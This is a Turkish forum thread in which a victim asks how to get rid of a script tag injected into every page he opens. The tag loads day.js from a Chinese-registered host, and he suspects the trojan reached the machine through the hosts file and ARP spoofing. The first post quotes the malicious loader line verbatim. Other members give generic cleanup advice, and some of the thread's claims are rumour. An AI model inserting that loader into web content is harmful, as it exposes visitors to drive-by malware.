Duyuruyu Kapat
Facebook Gözat
Twitter Gözat

JavaScript Virüsünden Nasıl Kurtulabilirim?

Konu, 'Sosyal Medya' kısmında chesterx tarafından paylaşıldı.

1. chesterx

chesterx Daimi Üye

Beğenilen Mesajlar:
    1
    Meslek:
    Web Programlama
    İnternette Hangi Sayfayı Açarsam Açayım Sayfanın Kaynak Kodlarının En Başında

<script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>
    Şu kod bulunuyor bu koddan nasıl kurtulabilirim ? Bağlantımı Etkiliyor!

2. roksan

roksan Daimi Üye

Beğenilen Mesajlar:
    0
    Bilgisayarınızda bir virüs taraması yapınız, ardından birde spy taraması yapınız, büyük bir ihtimalle düzelecektir, düzelmesse internet tarayıcınızı sistemden silipi tarayıcınızla ilgili tüm dosyaları (veri dosyalarınız hariç tabi) silip tarayıcınızı yeniden yüklemeyi deneyiniz...

3. chesterx

chesterx Daimi Üye

Beğenilen Mesajlar:
    1
    Meslek:
    Web Programlama
    ilgili bir bağlantı buldum her yolu denememe rağmen şu anlık bir çözüm olmadığını konuşuluyor

C:\WINDOWS\system32\drivers\etc

Trojan Bu klasördeki hosts dosyalarına bulaşıyor bilginize..

4. roksan

roksan Daimi Üye

Beğenilen Mesajlar:
    0
    Yavaşlamasının sebebi de böylece anlaşılmış oldu...

O halde büyük bir ihtimalle bir virüs...

5. MyWeb

MyWeb Üye

Beğenilen Mesajlar:
    0
    Güzel çalışan virüs böylerine hayranım bir ara bana büyük bir ezziyet çektirmişlerdi 3 bilgisayarımada bulaşmışlardı :( benim önerim bilgisayara format çek ve üstünde o kodu gördüğün html gibi web sayfalarını kesinlikle açma kodu sildikten sonra aç kolay gelsin biraz uzun sürecek ama.

6. chesterx

chesterx Daimi Üye

Beğenilen Mesajlar:
    1
    Meslek:
    Web Programlama
    Virüs çok güzel çalışıyor onun farkındayım da bir çok yol denedim şu an virüsten uzakım fakat etkileri halen devam ediyor internet sayfalarını açamıyorum

7. Pwm

Pwm Aktif Üye

Beğenilen Mesajlar:
    0
    Başka bir web tarayıcısı kullanmak çözüm olabilir mi acaba?

8. chesterx

chesterx Daimi Üye

Beğenilen Mesajlar:
    1
    Meslek:
    Web Programlama
    yaptığım işlemleri yazayım öncelikle

HAYIR ! Bütün Web tarayıcıları (Firefox, Opera dahil) bu virüse karşı koyamıyor yani hangi web tarayıcıyı kullanırsanız kullanın virüs yine etkisini kaybetmiyor..

Bu konu başlığını açtığımda google da arama yaptım fakat sadece çince ve sanırım ispanyolca sitelerde konuşuluyordu şimdi ise birçok Türk sitesindende bahsi geçen virüs hakkında yorumlar yapılmış virüs sistemin bir açığından faydalanarak sisteme sızıyor ve sistemden ağa bağlı olan diğer bilgisayarlara paketler gönderiyor. Hem ağda hem de pclerde şişmelere yol açarak bağlantının kesilmesini veya pcnin kasmasını sağlıyor şimdi bugün bütün günümü bu virüse ayırdım elimdeki bütün pclere formatlayıp antivirüs ile tarattım fakat sonuç başarısız internete bağlantığımda yine virüs ortaya çıkıyor anti ARP diye bir yazılım kullandım paketlerin hangi bilgisayarlar tarafından yollandığını buldum ve o bilgisayarları ağdan çıkarttım çıkarttığımda bir süreliğine ağdaki işleyiş yoluna girmişti fakat kısa bir süre sonra diğer pclerden de paketler geldi. Şimdi ise bir sitede okuduğum yolları tekrardan yapıyorum çözüm olacağından emin değilim fakat yaptığım işlem yeni formatlanmış bir pcnin sp3 dahil tüm güncelleştirmelerini yüklemek söylentilere göre virüsümüz RDS(Remote Data Services:Uzak Veri Servisleri) ve/veya flash açıklarını kullanarak yayılıyor çözüme ulaşırsam yorum yazıcağım hayırlı geceler bu virüse sahip olan arkadaşlara geçmiş olsun :)